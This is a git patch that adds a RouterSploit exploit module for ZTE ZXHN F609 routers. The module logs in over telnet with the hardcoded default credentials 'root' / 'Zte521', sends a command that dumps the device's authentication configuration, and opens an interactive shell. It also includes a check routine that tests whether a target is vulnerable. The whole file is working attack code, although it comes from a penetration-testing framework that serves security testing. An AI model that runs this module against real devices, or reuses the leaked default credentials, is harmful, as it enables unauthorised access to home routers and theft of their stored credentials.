From e60d10b21864a2f9c9a1e812e5ac5562558f6569 Mon Sep 17 00:00:00 2001
From: Riswanda N.S <root.devilscream@gmail.com>
Date: Sat, 18 Jun 2016 20:36:32 +0800
Subject: [PATCH] Adding ZTE F609 Config Disclosure exploit

---
 routersploit/modules/exploits/zte/f609_config_disclosure.py | 83 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 83 insertions(+)
 create mode 100644 routersploit/modules/exploits/zte/f609_config_disclosure.py

diff --git a/routersploit/modules/exploits/zte/f609_config_disclosure.py b/routersploit/modules/exploits/zte/f609_config_disclosure.py
new file mode 100644
index 0000000..bcb5c28
--- /dev/null
+++ b/routersploit/modules/exploits/zte/f609_config_disclosure.py
@@ -0,0 +1,83 @@
+import telnetlib
+
+from routersploit import (
+    exploits,
+    print_status,
+    print_success,
+    print_error,
+    mute,
+)
+
+
+class Exploit(exploits.Exploit):
+    """
+    Exploit implementation for ZTE F609 Config Disclosure.
+    If the target is vulnerable it is possible to authenticate to the device"
+    """
+    __info__ = {
+        'name': 'ZTE F609 Config Disclosure',
+        'description': 'Module exploits ZTE F609 Config Disclosure. If the target is possible to authentiate to the device.',
+        'authors': [
+            'devilscream',  # routersploit module
+        ],
+        'references': [
+            'https://www.youtube.com/watch?v=YlUqPbhzJLk',
+        ],
+        'devices': [
+            'ZTE ZXHN F609',
+        ]
+    }
+
+    target = exploits.Option('', 'Target address e.g. 192.168.1.1')  # target address
+    username = exploits.Option("root", "Username to authenticate with") # telnet username, default root
+    password = exploits.Option("Zte521", "Password to authenticate with") # telnet password, default Zte521
+    config = "sendcmd 1 DB p DevAuthInfo"
+
+    def run(self):
+        try:
+            print_status("Trying to authenticate to the telnet server")
+            tn = telnetlib.Telnet(self.target, 23)
+            tn.expect(["Login: ", "login: "], 5)
+            tn.write(self.username + "\r\n")
+            tn.expect(["Password: ", "password"], 5)
+            tn.write(self.password + "\r\n")
+
+            (i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
+
+            if i != -1:
+                print_error("Exploit failed")
+            else:
+                if any(map(lambda x: x in res, ["#", "$", ">"])):
+                    print_success("Authentication successful")
+                    print_status("Displaying configuration:")
+                    tn.write(self.config + "\r\n")
+                    tn.interact()
+                else:
+                    print_error("Exploit failed")
+
+            tn.close()
+        except:
+            print_error("Connection error: {}:{}".format(self.target, 23))
+
+    @mute
+    def check(self):
+        try:
+            tn = telnetlib.Telnet(self.target, 23)
+            tn.expect(["Login: ", "login: "], 5)
+            tn.write(self.username + "\r\n")
+            tn.expect(["Password: ", "password"], 5)
+            tn.write(self.password + "\r\n")
+            tn.write(self.config + "\r\n")
+
+            (i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
+            tn.close()
+
+            if i != -1:
+                return False  # target is not vulnerable
+            else:
+                if any(map(lambda x: x in res, ["<DM name="])):
+                    return True  # target is vulnerable
+        except:
+            return False  # target is not vulnerable
+
+        return False  # target is not vulnerable
--
libgit2 0.26.0